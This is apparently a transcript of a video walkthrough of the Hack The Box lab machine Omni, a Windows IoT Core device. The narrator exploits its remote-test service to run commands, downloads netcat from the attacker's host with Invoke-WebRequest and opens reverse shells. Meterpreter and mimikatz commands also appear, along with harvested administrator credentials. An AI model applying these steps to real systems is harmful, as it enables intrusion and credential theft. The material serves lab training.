Welcome back. Today, we're going to also tackle down another hack-the-box machine, one of the active ones. The machine name is Omni, and I choose this machine because it seems neither Windows or Linux. It seems something like unknown, right? So here's the IP, and the machine is powered on. So let's get started. So here the Nmap scan shows we have 135, 88, and here is some info about the web server. As you can see, Windows Device Portal. So this appears to be something like Internet of Things, right? If you remember the Internet of Things. If you go down, we see the underlying system is Windows, of course, but the core is Internet of Things. So let's find out what's in there. So here we first grab this 10, 10, 10, 204, 88. So we are presented with some basic authentication, which we don't have right now. I mean, we don't have any user predetermined or given username and password. So here we try something like admin. Let's see what we will get. Didn't work. Admin password. The methodology is to try first with default credentials. Now we click cancel and we go back to the Nmap scan. We see here Windows Device Portal. So let's Google a bit and see what we can find about this Windows Device Portal. So we go here, Google Windows Device Portal. Let's understand how this thing works. So Windows Device Portal lets you configure and manage your device remotely over a network or USB connection. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device. As a web server on your device, okay, that you can connect to from a web browser on a PC. If your device has a web browser, you also connect locally with the browser on that device. It's available on each device family, but features and setup vary based on each device requirements. Okay, great. So it means that we are dealing with an Internet of Things device. And this portal here, or this application, runs on this device. This device has a web server installed, which has the address ends with 04 and on port 88. That is used to control the device. So we are dealing with Internet of Things device. So let's go down. So we have some basic info about that. Device family, desktop, phone, Internet of Things. Yes, on by default, yes. The port is 88, as we saw. HTTPS, that's not relevant for us. And this is the application interface. And these are the installation instructions. Okay, so that is not for us for now. Now we have got some idea about how this thing works. Let's now attempt to search for username and password. Let's try that. So your browser will pop up, login screen, administrator, and default password. So let's try this with A, capital A. And the password is password. Great. Default credentials are not working, which is something positive from a security point of view or security standpoint. Okay, so let's now look for an exploit. Okay, so we have Safe Breach Labs. All right, let's read about that. So the method is exploiting the SI rep test service that is built in and running on the official images offered at Microsoft's site. This service is the client part of the HLK setup one may build in order to perform driver hardware tests on the Internet of Things device. It serves as the SIR-REP Debulicon T-shell protocol. So this is the exploit, and these are details about it. So you got the exploit now. I think the way to go is to download this. Let's clone it. Okay, so sudo git clone. What I'm looking for here, if I have it before. All right, so we have this here. Let's go cd. So we have the, okay, now the next thing, let's go back and see what is required to work on this. And install the requirements. Okay, so let's go back now. That's how we run this. Download file. Okay, so this is how we run commands on the remote system. Run arbitrary program. That's what we will use actually now, this one. We're going to run arbitrary commands on the remote host or the Internet of Things device with arguments impersonated as the currently logged in user. Okay. Now, what we will do now, let's go down. We will use this command here, right, to run some program or payload that connects back to us. So we can do that several ways. We can create MSF villain payload. We can create a PowerShell payload, and we can use Netcat. So basically, from one challenge I did on CyberSec Labs, there was a script called up. I don't know if I have it, if I still have this. Yes, this is the one. So let me open that. Nope, this one. So here is a PowerShell script, one-liner reverse shell. So you can use this, right? Okay. So I'm not going to use MSF Venom, and I'm not going to use PowerShell this time. I'm going to assume all the time from a realistic point of view that we are dealing with an enterprise device. And in an enterprise device, you should expect the presence of some kind of security software that would block your attack. So I go with Netcat, since Netcat is a standalone application and it is not flagged too much by security softwares or antivirus systems. So what we're going to do now, we're going to use this command to download Netcat onto our Internet of Things device. But before that, we're going to need to download Netcat, nc64.exe, and download. So I have it. Okay. So we have Netcat here. Now we go back to our command line, and from here, we will execute. So let's go back and take this this one. And we go to some editor. So this is okay. So here we will modify some stuff. For example, here we put the remote target IP, which is 10.10.10.204. And now return output as a logged on users, cmd, c windows. Here we execute the command, and here are the arguments. We're going to modify this starting from here. So /c, instead of this one, of echoing the user profile, we will invoke PowerShell. So invoke web request out file C, and here one. We're gonna need the okay. Let me make sure the command is correct. Let me open my manual here and look for power or invoke. Okay, so I don't have it. All right, so let me write it myself. So now we have Windows and now 2 backslash to escape character system 32. Then we will put that in normally the netcat. Let me go back here and see nc Windows system 32 path. Normally the netcat file exists on some path in Windows system 32. So let's find this. Windows path file for nc64. Okay, so there's nothing specific about this. Okay, so now let's leave this here, system32, and put it nc64.exe. All right, now root space dash URI, which will be our IP address. All right, now let's launch a Python listener now. Okay. Okay, let's run now the exploit tool and see if we can download the Netcat from our machine, right? So we have the web server running, enter. Invoke web request isn't recognized as an internal or external path. Let's go back to, okay, so here, forgot to put partial. Let's go back to the file, copy that, okay, run this again. So here, as you can see, Netcat has been downloaded. Okay, so now we have downloaded Netcat to the Internet of Things device. Now the next thing is we execute this. So let's first go back and run sudo nc-lbp 4545. And now we are ready to execute the payload, which is Netcat. Okay, now we go back to the exploit page and we see what we will execute. So from this, okay, we're going to use the same command, right, to execute the Netcat. So let's go back to the file. So here we have cmd.exe, which is totally fine. --args, totally fine. C, here we define, we're going to take that, remove all of this, all the way. We're going to leave /c. Okay. We paste. So /c Windows will define the path of the Netcat. And then here we put our IP address 10, 10, 14, 18, the port 4545, and that's it. So copy that, go back, command line, paste. Isn't recognized, so it didn't work. So we need to put NC64 somewhere else. Okay, so let's go back. So here we will need to grab the command again. Let's go back to the command line. Take this. No, the one that worked is this one. Let's copy it. This is the command that downloaded the Netcat file. So we go back. We will download this Netcat again, but to a different path, since the current path we specified didn't work. So we will put spool, and we will launch Netcat as a driver. This is the best way, I guess. And drivers, we put the directory was something like, let's go here. Or let's find it from our system. It's better. So basically Windows. So Windows, we have the system32, which is here, spool. Okay, drivers. All right, so here x64, no. Colors. All right, let's go back, pick one. I guess if we put that into drivers, it's fine. Let's go back to drivers, spool, drivers. No, we need to put this somewhere here. Okay, let's try with x64. And we will download this again. go back, clear. Okay, now we will execute with a bit of modification. So here, instead of that, we will copy all the way, starting from here, and we end with, or take this. Okay. So let's try to execute this. The system cannot find the path specified, so there is no x64. All right, let's try with, okay, let's start with color. Maybe color will work. So instead of, so color, great. Now, here, sudo ms, no, not sudo, root actually, msf venom -p windows x64 interpreter reverse TCP lhost import 4546 -fxe output to hello.exe. Okay, MSF console. Use exploit multi handler set payload Windows x64 interpreter reverse TCP interpreter set lhost 10.10.14.18 set lport 4546 run. Okay, that is better. So now what we need to do now is to escalate our privileges. So first we see who we are, who am I /user. So it doesn't run who am I for some reason. Let's see why. So we go back to the exploit page. Is there any info about this? No. Okay. So we can't run who am I user, which means we can't run the other commands. That's pretty weird. Okay, so let's go back and list the directory. So let's go to users, public only, right? So are there no users in the system? Empty. Okay, mimikatz cert util -url cache -f http 10.10.14.18 mimikatz.exe mimikatz. So we have something wrong, which is the cert util no -f object not found cert util. Oh, there is no cert util. Okay, that tops everything off. Okay, cd Let's go to program files, put codes. Windows PowerShell. Not much to be seen here, but let's find out anyway. Windows PowerShell. This is very bad. See the modules. I don't think we are at the right place. Type access denied. Whoa. Go up. Okay, package management. Package management. Okay. So here also we have nothing. Let's go back. Let's use ls-force. Okay. Let's go to package. Here ls-force. So we have a hidden file, r.bat. Okay, let's view the content of this file, cat r.bat. So we have username and password, net user app, net user administrator, and this is the password. If we try with these to log in with these credentials, do you think it will work? Let's try. So take this, run the new one. Sudo evil winrm dash I 10 204 dash u. It was with lowercase, right? Lowercase. Okay. Administrator dash p and the password. Now hit enter. Looks like it will not work. See, the connection is not established as quick as we used to do. Yep, so we can't log in with this administrator stuff. Bad for us. Plain text credentials, I don't want this. So administrator, let's go back to the browser and examine port 80, see what we have there. So 88, so administrator. So the password is somewhere. Okay, this is the password. If we can log in with this user on the portal that controls the Internet of Things device, we can launch command, right? So sign in, and that worked. Okay, so let's find out how we can control this device. Device settings, change your device name, password, apps, apps manager, file explorer. Can we upload something here? Videos, public documents, processes, detail. Oh, run command. So here we can run stuff as I can see. Okay, so now here, what if we can establish another reverse shell, right, with using the admin user. Let's see if we catch a reverse shell, it's going to be under administrator or like the web server, right? So let's try this. So let's go back to the comment here. I'm going to borrow this line. C Windows drivers, NC64, all the way here. Okay. And on my console, launch a new one, light one, NC-LVP 4547. So now this one will be 4547. Let's take it. And run it. What happened? Oh, so we cached a shell here. So who am I? The term who am I is not recognized. Okay. Failed to run the command. Click OK. Let's go back. I don't know why this is not working. So I can find out if we are on the right path or not, if we routed the system by trying to go to desktop and display the contents of the flag. So cd there, cd users, cd public, ls-force. Okay. Let's go back and use ls here force. So we got something like default, cd default, okay, so there is nothing here. Let's go back, ls-force, data program files, users, windows, well, that's really confusing. I can't know who am I, and I can't find any users here. Let's go back to users. Really? No users? ls-force again. Maybe it's hidden or something. Let me try cd administrator. Yeah, it's not specified. Looks like we are some ghost here. Okay, net user administrator. If I was able to change the administrator password, I think we are administrator then. So here, let's try. What was the password? Oh, not this one. Go back. Okay, this is the old password. Let me try to change this. See if you are successful. With 2. Okay, so we were able to change the administrator password, which means we are administrator. I suppose so, but for one reason, I don't know why I can't find the user here in the users section. No idea why. But I guess the only missing stuff here is the flag. We need to find the flag somewhere in the machine. And to be honest, I did the lab before and I haven't arrived at the right place. So I guess we need to find this now. Let's go to data, users. We have another users folder here. ls force. Okay, so we found it. It's here. cd administrator ls-force. Yep, so this is the root flag. So now cat root. Alright then, this seems to be an encrypted value. I'm not interested in decrypting that value actually, since we got the administrator access. So that was it, and see you in the next video.